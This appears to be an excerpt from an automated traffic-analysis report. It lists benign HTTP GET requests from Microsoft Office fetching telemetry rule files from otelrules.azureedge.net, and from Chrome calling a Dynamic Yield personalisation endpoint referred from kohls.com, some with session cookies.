Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRI; AWSALBCORS=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRIIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRI; AWSALBCORS=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRIIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRI; AWSALBCORS=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRIIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRI; AWSALBCORS=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRIIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRI; AWSALBCORS=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRIIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRI; AWSALBCORS=oLZL2HuQ8StaSx4bjcbholtdaA4wySNkEqPjpm7owccZLXYeDSWsv1WvuPvqU3vy250d1WP2n5Jppn5fmzheDcTtw8/Et+JKnDI7CH79+gj8TzCxgjHfdxr5rSRIIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=e/xzt6RhRvfExVGgr+V6NDczRBQIYx5G1Pe1Xf0E9W+9grhgPhJIoajfS3cXX8mYeXuXJeCuxDSR3fsgdq58lm7hprbCBL1ijU/Mr5KCDzSMrBYudjceUhWCfF1u; AWSALBCORS=e/xzt6RhRvfExVGgr+V6NDczRBQIYx5G1Pe1Xf0E9W+9grhgPhJIoajfS3cXX8mYeXuXJeCuxDSR3fsgdq58lm7hprbCBL1ijU/Mr5KCDzSMrBYudjceUhWCfF1uIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=e/xzt6RhRvfExVGgr+V6NDczRBQIYx5G1Pe1Xf0E9W+9grhgPhJIoajfS3cXX8mYeXuXJeCuxDSR3fsgdq58lm7hprbCBL1ijU/Mr5KCDzSMrBYudjceUhWCfF1u; AWSALBCORS=e/xzt6RhRvfExVGgr+V6NDczRBQIYx5G1Pe1Xf0E9W+9grhgPhJIoajfS3cXX8mYeXuXJeCuxDSR3fsgdq58lm7hprbCBL1ijU/Mr5KCDzSMrBYudjceUhWCfF1uIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
